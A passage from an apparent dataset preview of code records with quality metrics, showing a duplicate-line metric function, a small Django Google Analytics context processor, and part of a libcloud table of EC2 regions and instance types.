- qsc_code_frac_chars_long_word_length: 0
- qsc_code_frac_lines_string_concat: null
- qsc_code_cate_encoded_data: 0
- qsc_code_frac_chars_hex_words: 0
- qsc_code_frac_lines_prompt_comments: 0
- qsc_code_frac_lines_assert: 0
- qsc_codepython_cate_ast: 0
- qsc_codepython_frac_lines_func_ratio: 0
- qsc_codepython_cate_var_zero: 0
- qsc_codepython_frac_lines_pass: 0
- qsc_codepython_frac_lines_import: 0
- qsc_codepython_frac_lines_simplefunc: 0
- qsc_codepython_score_lines_no_logic: 0
- qsc_codepython_frac_lines_print: 0
- effective: 0
- hits: 7
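This record's `qsc_code_frac_lines_dupe_lines_quality_signal` of 0.827273 is driven by the near-identical AE and VAE training loops in the file above. A plausible line-level duplicate measure, inferred from the column name rather than taken from the pipeline's code:

```python
from collections import Counter

def frac_lines_dupe_lines(content: str) -> float:
    """Fraction of non-empty lines whose stripped text appears more than once."""
    lines = [line.strip() for line in content.splitlines() if line.strip()]
    if not lines:
        return 0.0
    counts = Counter(lines)
    dupes = sum(c for c in counts.values() if c > 1)
    return dupes / len(lines)
```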
**Record 5**

- hexsha: c364f9f64e3a263734552f026ff7ab28a230f6e5
- size: 125
- ext: py
- lang: Python
- max_stars_repo_path: jarbas/core/context_processors.py
- max_stars_repo_name: vbarceloscs/serenata-de-amor
- max_stars_repo_head_hexsha: 87e6c8932469478d177372ed7b6311cd66a71efe
- max_stars_repo_licenses: ["MIT"]
- max_stars_count: 3,001
- max_stars_repo_stars_event_min_datetime: 2016-08-08T17:43:36.000Z
- max_stars_repo_stars_event_max_datetime: 2018-02-09T19:13:35.000Z
- max_issues_repo_path: jarbas/core/context_processors.py
- max_issues_repo_name: vbarceloscs/serenata-de-amor
- max_issues_repo_head_hexsha: 87e6c8932469478d177372ed7b6311cd66a71efe
- max_issues_repo_licenses: ["MIT"]
- max_issues_count: 259
- max_issues_repo_issues_event_min_datetime: 2016-08-08T09:53:23.000Z
- max_issues_repo_issues_event_max_datetime: 2018-01-24T13:30:27.000Z
- max_forks_repo_path: jarbas/core/context_processors.py
- max_forks_repo_name: vbarceloscs/serenata-de-amor
- max_forks_repo_head_hexsha: 87e6c8932469478d177372ed7b6311cd66a71efe
- max_forks_repo_licenses: ["MIT"]
- max_forks_count: 674
- max_forks_repo_forks_event_min_datetime: 2016-08-08T22:04:04.000Z
- max_forks_repo_forks_event_max_datetime: 2018-02-05T15:30:15.000Z
- content:

```python
from django.conf import settings
def google_analytics(request):
return {'google_analytics': settings.GOOGLE_ANALYTICS}
```

- avg_line_length: 20.833333
- max_line_length: 58
- alphanum_fraction: 0.8
- qsc_code_num_words_quality_signal: 15
- qsc_code_num_chars_quality_signal: 125
- qsc_code_mean_word_length_quality_signal: 6.466667
- qsc_code_frac_words_unique_quality_signal: 0.666667
- qsc_code_frac_chars_top_2grams_quality_signal: 0.463918
- qsc_code_frac_chars_top_3grams_quality_signal: 0
- qsc_code_frac_chars_top_4grams_quality_signal: 0
- qsc_code_frac_chars_dupe_5grams_quality_signal: 0
- qsc_code_frac_chars_dupe_6grams_quality_signal: 0
- qsc_code_frac_chars_dupe_7grams_quality_signal: 0
- qsc_code_frac_chars_dupe_8grams_quality_signal: 0
- qsc_code_frac_chars_dupe_9grams_quality_signal: 0
- qsc_code_frac_chars_dupe_10grams_quality_signal: 0
- qsc_code_frac_chars_replacement_symbols_quality_signal: 0
- qsc_code_frac_chars_digital_quality_signal: 0
- qsc_code_frac_chars_whitespace_quality_signal: 0.12
- qsc_code_size_file_byte_quality_signal: 125
- qsc_code_num_lines_quality_signal: 5
- qsc_code_num_chars_line_max_quality_signal: 59
- qsc_code_num_chars_line_mean_quality_signal: 25
- qsc_code_frac_chars_alphabet_quality_signal: 0.881818
- qsc_code_frac_chars_comments_quality_signal: 0
- qsc_code_cate_xml_start_quality_signal: 0
- qsc_code_frac_lines_dupe_lines_quality_signal: 0
- qsc_code_cate_autogen_quality_signal: 0
- qsc_code_frac_lines_long_string_quality_signal: 0
- qsc_code_frac_chars_string_length_quality_signal: 0.128
- qsc_code_frac_chars_long_word_length_quality_signal: 0
- qsc_code_frac_lines_string_concat_quality_signal: 0
- qsc_code_cate_encoded_data_quality_signal: 0
- qsc_code_frac_chars_hex_words_quality_signal: 0
- qsc_code_frac_lines_prompt_comments_quality_signal: 0
- qsc_code_frac_lines_assert_quality_signal: 0
- qsc_codepython_cate_ast_quality_signal: 1
- qsc_codepython_frac_lines_func_ratio_quality_signal: 0.333333
- qsc_codepython_cate_var_zero_quality_signal: false
- qsc_codepython_frac_lines_pass_quality_signal: 0
- qsc_codepython_frac_lines_import_quality_signal: 0.333333
- qsc_codepython_frac_lines_simplefunc_quality_signal: 0.333333
- qsc_codepython_score_lines_no_logic_quality_signal: 1
- qsc_codepython_frac_lines_print_quality_signal: 0
- qsc_code_num_words: 1
- qsc_code_num_chars: 0
- qsc_code_mean_word_length: 0
- qsc_code_frac_words_unique: null
- qsc_code_frac_chars_top_2grams: 1
- qsc_code_frac_chars_top_3grams: 0
- qsc_code_frac_chars_top_4grams: 0
- qsc_code_frac_chars_dupe_5grams: 0
- qsc_code_frac_chars_dupe_6grams: 0
- qsc_code_frac_chars_dupe_7grams: 0
- qsc_code_frac_chars_dupe_8grams: 0
- qsc_code_frac_chars_dupe_9grams: 0
- qsc_code_frac_chars_dupe_10grams: 0
- qsc_code_frac_chars_replacement_symbols: 0
- qsc_code_frac_chars_digital: 0
- qsc_code_frac_chars_whitespace: 0
- qsc_code_size_file_byte: 0
- qsc_code_num_lines: 0
- qsc_code_num_chars_line_max: 1
- qsc_code_num_chars_line_mean: 0
- qsc_code_frac_chars_alphabet: 0
- qsc_code_frac_chars_comments: 0
- qsc_code_cate_xml_start: 0
- qsc_code_frac_lines_dupe_lines: 0
- qsc_code_cate_autogen: 0
- qsc_code_frac_lines_long_string: 0
- qsc_code_frac_chars_string_length: 0
- qsc_code_frac_chars_long_word_length: 0
- qsc_code_frac_lines_string_concat: null
- qsc_code_cate_encoded_data: 0
- qsc_code_frac_chars_hex_words: 0
- qsc_code_frac_lines_prompt_comments: 0
- qsc_code_frac_lines_assert: 0
- qsc_codepython_cate_ast: 0
- qsc_codepython_frac_lines_func_ratio: 1
- qsc_codepython_cate_var_zero: 0
- qsc_codepython_frac_lines_pass: 0
- qsc_codepython_frac_lines_import: 1
- qsc_codepython_frac_lines_simplefunc: 1
- qsc_codepython_score_lines_no_logic: 1
- qsc_codepython_frac_lines_print: 0
- effective: 0
- hits: 7
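The next record's content opens with "# File generated by contrib/scrape-ec2-sizes.py script - DO NOT EDIT manually", exactly the kind of banner a `qsc_code_cate_autogen`-style signal would flag. A minimal detector sketch; the marker list and head-window size are assumptions, since the actual heuristic behind the column is not specified in this table.

```python
import re

# Hypothetical marker list, not the dataset's actual heuristic.
AUTOGEN_RE = re.compile(r"generated by|do not edit|auto-?generated", re.IGNORECASE)

def cate_autogen(content: str, head_lines: int = 5) -> int:
    """Return 1 if the first few lines look like an auto-generation banner."""
    head = "\n".join(content.splitlines()[:head_lines])
    return int(bool(AUTOGEN_RE.search(head)))
```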
**Record 6**

- hexsha: c37eb98768066defa62a097e3fabdddd9d4dd3b1
- size: 162,822
- ext: py
- lang: Python
- max_stars_repo_path: libcloud/compute/constants/ec2_region_details_complete.py
- max_stars_repo_name: r2ronoha/libcloud
- max_stars_repo_head_hexsha: 1524a4c54d79284f1172b32e0d9598ec8b47eda1
- max_stars_repo_licenses: ["Apache-2.0"]
- max_stars_count: null
- max_stars_repo_stars_event_min_datetime: null
- max_stars_repo_stars_event_max_datetime: null
- max_issues_repo_path: libcloud/compute/constants/ec2_region_details_complete.py
- max_issues_repo_name: r2ronoha/libcloud
- max_issues_repo_head_hexsha: 1524a4c54d79284f1172b32e0d9598ec8b47eda1
- max_issues_repo_licenses: ["Apache-2.0"]
- max_issues_count: null
- max_issues_repo_issues_event_min_datetime: null
- max_issues_repo_issues_event_max_datetime: null
- max_forks_repo_path: libcloud/compute/constants/ec2_region_details_complete.py
- max_forks_repo_name: r2ronoha/libcloud
- max_forks_repo_head_hexsha: 1524a4c54d79284f1172b32e0d9598ec8b47eda1
- max_forks_repo_licenses: ["Apache-2.0"]
- max_forks_count: 1
- max_forks_repo_forks_event_min_datetime: 2019-08-05T10:12:02.000Z
- max_forks_repo_forks_event_max_datetime: 2019-08-05T10:12:02.000Z
- content (truncated in this preview):

```python
# File generated by contrib/scrape-ec2-sizes.py script - DO NOT EDIT manually
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
REGION_DETAILS = {
"af-south-1": {
"api_name": "ec2_af_south",
"country": "South Africa",
"endpoint": "ec2.af-south-1.amazonaws.com",
"id": "af-south-1",
"instance_types": [],
"signature_version": "4",
},
"ap-east-1": {
"api_name": "ec2_ap_east",
"country": "Hong Kong",
"endpoint": "ec2.ap-east-1.amazonaws.com",
"id": "ap-east-1",
"instance_types": [
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.18xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"x1.16xlarge",
"x1.32xlarge",
],
"signature_version": "2",
},
"ap-northeast-1": {
"api_name": "ec2_ap_northeast",
"country": "Japan",
"endpoint": "ec2.ap-northeast-1.amazonaws.com",
"id": "ap-northeast-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c1.medium",
"c1.xlarge",
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6gd.12xlarge",
"c6gd.16xlarge",
"c6gd.2xlarge",
"c6gd.4xlarge",
"c6gd.8xlarge",
"c6gd.large",
"c6gd.medium",
"c6gd.xlarge",
"c6gn.12xlarge",
"c6gn.16xlarge",
"c6gn.2xlarge",
"c6gn.4xlarge",
"c6gn.8xlarge",
"c6gn.large",
"c6gn.medium",
"c6gn.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"cc2.8xlarge",
"cr1.8xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"d3.2xlarge",
"d3.4xlarge",
"d3.8xlarge",
"d3.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4ad.16xlarge",
"g4ad.2xlarge",
"g4ad.4xlarge",
"g4ad.8xlarge",
"g4ad.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"hs1.8xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m1.large",
"m1.medium",
"m1.small",
"m1.xlarge",
"m2.2xlarge",
"m2.4xlarge",
"m2.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5dn.12xlarge",
"m5dn.16xlarge",
"m5dn.24xlarge",
"m5dn.2xlarge",
"m5dn.4xlarge",
"m5dn.8xlarge",
"m5dn.large",
"m5dn.xlarge",
"m5n.12xlarge",
"m5n.16xlarge",
"m5n.24xlarge",
"m5n.2xlarge",
"m5n.4xlarge",
"m5n.8xlarge",
"m5n.large",
"m5n.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6gd.12xlarge",
"m6gd.16xlarge",
"m6gd.2xlarge",
"m6gd.4xlarge",
"m6gd.8xlarge",
"m6gd.large",
"m6gd.medium",
"m6gd.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p3dn.24xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6gd.12xlarge",
"r6gd.16xlarge",
"r6gd.2xlarge",
"r6gd.4xlarge",
"r6gd.8xlarge",
"r6gd.large",
"r6gd.medium",
"r6gd.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t1.micro",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"vt1.24xlarge",
"vt1.3xlarge",
"vt1.6xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"x2idn.16xlarge",
"x2idn.24xlarge",
"x2idn.32xlarge",
"x2iedn.16xlarge",
"x2iedn.24xlarge",
"x2iedn.2xlarge",
"x2iedn.32xlarge",
"x2iedn.4xlarge",
"x2iedn.8xlarge",
"x2iedn.xlarge",
"x2iezn.12xlarge",
"x2iezn.2xlarge",
"x2iezn.4xlarge",
"x2iezn.6xlarge",
"x2iezn.8xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "2",
},
"ap-northeast-2": {
"api_name": "ec2_ap_northeast",
"country": "South Korea",
"endpoint": "ec2.ap-northeast-2.amazonaws.com",
"id": "ap-northeast-2",
"instance_types": [
"c3.2xlarge",
"c3.4xlarge",
"c3.8xlarge",
"c3.large",
"c3.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
"c6g.xlarge",
"c6i.12xlarge",
"c6i.16xlarge",
"c6i.24xlarge",
"c6i.2xlarge",
"c6i.32xlarge",
"c6i.4xlarge",
"c6i.8xlarge",
"c6i.large",
"c6i.xlarge",
"d2.2xlarge",
"d2.4xlarge",
"d2.8xlarge",
"d2.xlarge",
"g2.2xlarge",
"g2.8xlarge",
"g3.16xlarge",
"g3.4xlarge",
"g3.8xlarge",
"g3s.xlarge",
"g4dn.12xlarge",
"g4dn.16xlarge",
"g4dn.2xlarge",
"g4dn.4xlarge",
"g4dn.8xlarge",
"g4dn.xlarge",
"g5g.16xlarge",
"g5g.2xlarge",
"g5g.4xlarge",
"g5g.8xlarge",
"g5g.xlarge",
"i2.2xlarge",
"i2.4xlarge",
"i2.8xlarge",
"i2.large",
"i2.xlarge",
"i3.16xlarge",
"i3.2xlarge",
"i3.4xlarge",
"i3.8xlarge",
"i3.large",
"i3.xlarge",
"i3en.12xlarge",
"i3en.24xlarge",
"i3en.2xlarge",
"i3en.3xlarge",
"i3en.6xlarge",
"i3en.large",
"i3en.xlarge",
"inf1.24xlarge",
"inf1.2xlarge",
"inf1.6xlarge",
"inf1.xlarge",
"m3.2xlarge",
"m3.large",
"m3.medium",
"m3.xlarge",
"m4.10xlarge",
"m4.16xlarge",
"m4.2xlarge",
"m4.4xlarge",
"m4.large",
"m4.xlarge",
"m5.12xlarge",
"m5.16xlarge",
"m5.24xlarge",
"m5.2xlarge",
"m5.4xlarge",
"m5.8xlarge",
"m5.large",
"m5.xlarge",
"m5a.12xlarge",
"m5a.16xlarge",
"m5a.24xlarge",
"m5a.2xlarge",
"m5a.4xlarge",
"m5a.8xlarge",
"m5a.large",
"m5a.xlarge",
"m5ad.12xlarge",
"m5ad.16xlarge",
"m5ad.24xlarge",
"m5ad.2xlarge",
"m5ad.4xlarge",
"m5ad.8xlarge",
"m5ad.large",
"m5ad.xlarge",
"m5d.12xlarge",
"m5d.16xlarge",
"m5d.24xlarge",
"m5d.2xlarge",
"m5d.4xlarge",
"m5d.8xlarge",
"m5d.large",
"m5d.xlarge",
"m5zn.12xlarge",
"m5zn.2xlarge",
"m5zn.3xlarge",
"m5zn.6xlarge",
"m5zn.large",
"m5zn.xlarge",
"m6g.12xlarge",
"m6g.16xlarge",
"m6g.2xlarge",
"m6g.4xlarge",
"m6g.8xlarge",
"m6g.large",
"m6g.medium",
"m6g.xlarge",
"m6i.12xlarge",
"m6i.16xlarge",
"m6i.24xlarge",
"m6i.2xlarge",
"m6i.32xlarge",
"m6i.4xlarge",
"m6i.8xlarge",
"m6i.large",
"m6i.xlarge",
"p2.16xlarge",
"p2.8xlarge",
"p2.xlarge",
"p3.16xlarge",
"p3.2xlarge",
"p3.8xlarge",
"p4d.24xlarge",
"r3.2xlarge",
"r3.4xlarge",
"r3.8xlarge",
"r3.large",
"r3.xlarge",
"r4.16xlarge",
"r4.2xlarge",
"r4.4xlarge",
"r4.8xlarge",
"r4.large",
"r4.xlarge",
"r5.12xlarge",
"r5.16xlarge",
"r5.24xlarge",
"r5.2xlarge",
"r5.4xlarge",
"r5.8xlarge",
"r5.large",
"r5.xlarge",
"r5a.12xlarge",
"r5a.16xlarge",
"r5a.24xlarge",
"r5a.2xlarge",
"r5a.4xlarge",
"r5a.8xlarge",
"r5a.large",
"r5a.xlarge",
"r5ad.12xlarge",
"r5ad.16xlarge",
"r5ad.24xlarge",
"r5ad.2xlarge",
"r5ad.4xlarge",
"r5ad.8xlarge",
"r5ad.large",
"r5ad.xlarge",
"r5b.12xlarge",
"r5b.16xlarge",
"r5b.24xlarge",
"r5b.2xlarge",
"r5b.4xlarge",
"r5b.8xlarge",
"r5b.large",
"r5b.xlarge",
"r5d.12xlarge",
"r5d.16xlarge",
"r5d.24xlarge",
"r5d.2xlarge",
"r5d.4xlarge",
"r5d.8xlarge",
"r5d.large",
"r5d.xlarge",
"r5dn.12xlarge",
"r5dn.16xlarge",
"r5dn.24xlarge",
"r5dn.2xlarge",
"r5dn.4xlarge",
"r5dn.8xlarge",
"r5dn.large",
"r5dn.xlarge",
"r5n.12xlarge",
"r5n.16xlarge",
"r5n.24xlarge",
"r5n.2xlarge",
"r5n.4xlarge",
"r5n.8xlarge",
"r5n.large",
"r5n.xlarge",
"r6g.12xlarge",
"r6g.16xlarge",
"r6g.2xlarge",
"r6g.4xlarge",
"r6g.8xlarge",
"r6g.large",
"r6g.medium",
"r6g.xlarge",
"r6i.12xlarge",
"r6i.16xlarge",
"r6i.24xlarge",
"r6i.2xlarge",
"r6i.32xlarge",
"r6i.4xlarge",
"r6i.8xlarge",
"r6i.large",
"r6i.xlarge",
"t2.2xlarge",
"t2.large",
"t2.medium",
"t2.micro",
"t2.nano",
"t2.small",
"t2.xlarge",
"t3.2xlarge",
"t3.large",
"t3.medium",
"t3.micro",
"t3.nano",
"t3.small",
"t3.xlarge",
"t3a.2xlarge",
"t3a.large",
"t3a.medium",
"t3a.micro",
"t3a.nano",
"t3a.small",
"t3a.xlarge",
"t4g.2xlarge",
"t4g.large",
"t4g.medium",
"t4g.micro",
"t4g.nano",
"t4g.small",
"t4g.xlarge",
"u-6tb1.112xlarge",
"u-6tb1.56xlarge",
"x1.16xlarge",
"x1.32xlarge",
"x1e.16xlarge",
"x1e.2xlarge",
"x1e.32xlarge",
"x1e.4xlarge",
"x1e.8xlarge",
"x1e.xlarge",
"z1d.12xlarge",
"z1d.2xlarge",
"z1d.3xlarge",
"z1d.6xlarge",
"z1d.large",
"z1d.xlarge",
],
"signature_version": "4",
},
"ap-northeast-3": {
"api_name": "ec2_ap_northeast",
"country": "Japan",
"endpoint": "ec2.ap-northeast-3.amazonaws.com",
"id": "ap-northeast-3",
"instance_types": [],
"signature_version": "4",
},
"ap-south-1": {
"api_name": "ec2_ap_south_1",
"country": "India",
"endpoint": "ec2.ap-south-1.amazonaws.com",
"id": "ap-south-1",
"instance_types": [
"a1.2xlarge",
"a1.4xlarge",
"a1.large",
"a1.medium",
"a1.xlarge",
"c4.2xlarge",
"c4.4xlarge",
"c4.8xlarge",
"c4.large",
"c4.xlarge",
"c5.12xlarge",
"c5.18xlarge",
"c5.24xlarge",
"c5.2xlarge",
"c5.4xlarge",
"c5.9xlarge",
"c5.large",
"c5.xlarge",
"c5a.12xlarge",
"c5a.16xlarge",
"c5a.24xlarge",
"c5a.2xlarge",
"c5a.4xlarge",
"c5a.8xlarge",
"c5a.large",
"c5a.xlarge",
"c5d.12xlarge",
"c5d.18xlarge",
"c5d.24xlarge",
"c5d.2xlarge",
"c5d.4xlarge",
"c5d.9xlarge",
"c5d.large",
"c5d.xlarge",
"c5n.18xlarge",
"c5n.2xlarge",
"c5n.4xlarge",
"c5n.9xlarge",
"c5n.large",
"c5n.xlarge",
"c6a.12xlarge",
"c6a.16xlarge",
"c6a.24xlarge",
"c6a.2xlarge",
"c6a.32xlarge",
"c6a.48xlarge",
"c6a.4xlarge",
"c6a.8xlarge",
"c6a.large",
"c6a.xlarge",
"c6g.12xlarge",
"c6g.16xlarge",
"c6g.2xlarge",
"c6g.4xlarge",
"c6g.8xlarge",
"c6g.large",
"c6g.medium",
